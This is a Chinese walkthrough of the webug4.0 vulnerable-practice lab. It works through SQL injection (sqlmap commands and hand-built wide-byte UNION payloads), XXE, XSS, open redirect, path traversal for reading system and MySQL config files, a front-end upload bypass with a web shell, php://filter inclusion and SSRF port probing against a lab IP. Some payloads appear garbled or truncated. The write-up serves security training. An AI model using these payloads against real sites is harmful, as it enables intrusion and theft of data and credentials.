webug4.0 后面持续更新

第四关:post注入
打开网站
webug4.0 后面持续更新_第1张图片在搜索框中输入‘,之后报错
在这里插入图片描述用bp抓包之后保存在本地
webug4.0 后面持续更新_第2张图片
直接用sqlmap跑,跑数据库
sqlmap -r C:\Users\Administrator\Desktop\2.txt -p “keyWordName” --level=2 --dbs --batch
webug4.0 后面持续更新_第3张图片 表名
sqlmap -r C:\Users\Administrator\Desktop\2.txt -p “keyWordName” --level=2 -D webug --tables --batch
webug4.0 后面持续更新_第4张图片
字段名
sqlmap -r C:\Users\Administrator\Desktop\2.txt -p “keyWordName” --level=2 -D webug -T flag --columns --batch
webug4.0 后面持续更新_第5张图片

sqlmap -r C:\Users\Administrator\Desktop\2.txt -p “keyWordName” --level=2 -D webug -T flag -C flag --dump --batch
第五关
和第四关差不多直接用sqlmap跑就行
第六关:宽字节注入
webug4.0 后面持续更新_第6张图片由于是款字节注入
打一个%df试试
在这里插入图片描述
发现存在注入点,可以手工注入
1、判断列数:
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 order by 1%23
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 order by 2%23
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 order by 3%23
order by 3 时报错,说明只有两列。
2、库名:
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 and 1=2 union select 1,database()%23

3、表名:
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 and 1=2
union select ,1,group_concat(table_name)
from information_schema.tables
where table_schema=database()%23
4.字段
http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 and 1=2 union select 1,group_concat(column_name)
from information_schema.columns
where table_name=webug and table_schema=database()%23
sqlmap:
数据库
sqlmap -u http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 --dbs
webug4.0 后面持续更新_第7张图片表:
sqlmap -u http://192.168.59.128/control/sqlinject/width_byte_injection.php?id=1%df%27 -D webug --tables
webug4.0 后面持续更新_第8张图片后面就是重复步骤了
第7关
webug4.0 后面持续更新_第9张图片输入admin之后发现
webug4.0 后面持续更新_第10张图片查看服务版本

]>

&content;

webug4.0 后面持续更新_第11张图片webug4.0 后面持续更新_第12张图片测量半天找不到其他的,查看源码发现有一个payload,然后解压之后发现在d盘有一个1.txt,但是我没有d盘,直接在c盘下面建立一个1.txt
webug4.0 后面持续更新_第13张图片直接写入xxe代码爆出flag

]>

&content;

第九关 反射xss
这关没有过滤,构造就可以了

第13关 过滤xss
构造语句,发现被过滤了
webug4.0 后面持续更新_第14张图片试了大小写,也是一样被过滤了
然后试这个一下就爆出flag
第14关 连接注入
看题目试连接注入
直接构造asads试试
发现可以跳转的百度
第15关

webug4.0 后面持续更新_第15张图片可以抓包看路径,也可以在页面审查看路径,我是抓包
webug4.0 后面持续更新_第16张图片然后
修改路径,下载其他的比如boot.ini
?file=…/boot.ini
webug4.0 后面持续更新_第17张图片第16关
和上关差不多,构造语句下载mysql配置文件
webug4.0 后面持续更新_第18张图片第17关 文件上传(前端拦截)
webug4.0 后面持续更新_第19张图片上传一个.php文件马上就拦截
webug4.0 后面持续更新_第20张图片1,修改前端代码绕过
2,burp抓包改包
webug4.0 后面持续更新_第21张图片
为了简单直接写一句话,webug4.0 后面持续更新_第22张图片
上蚁剑
webug4.0 后面持续更新_第23张图片在里面找flag就可以了

碧微

第27关 文件包含

在这里插入图片描述http://192.168.59.128/control/more/file_include.php?filename=php://filter/convert.base64-encode/resource=…/…/index.php
在这里插入图片描述解码就可以看到index.php源码了
webug4.0 后面持续更新_第24张图片
第30关 ssrf
在这里插入图片描述查看win的基本配置文件
在这里插入图片描述查看系统版本
在这里插入图片描述
直接使用http://192.168.59.128/control/more/ssrf.php?url=http://192.168.59.128:22来探测22端口是否开放

你可能感兴趣的:(webug4.0 后面持续更新)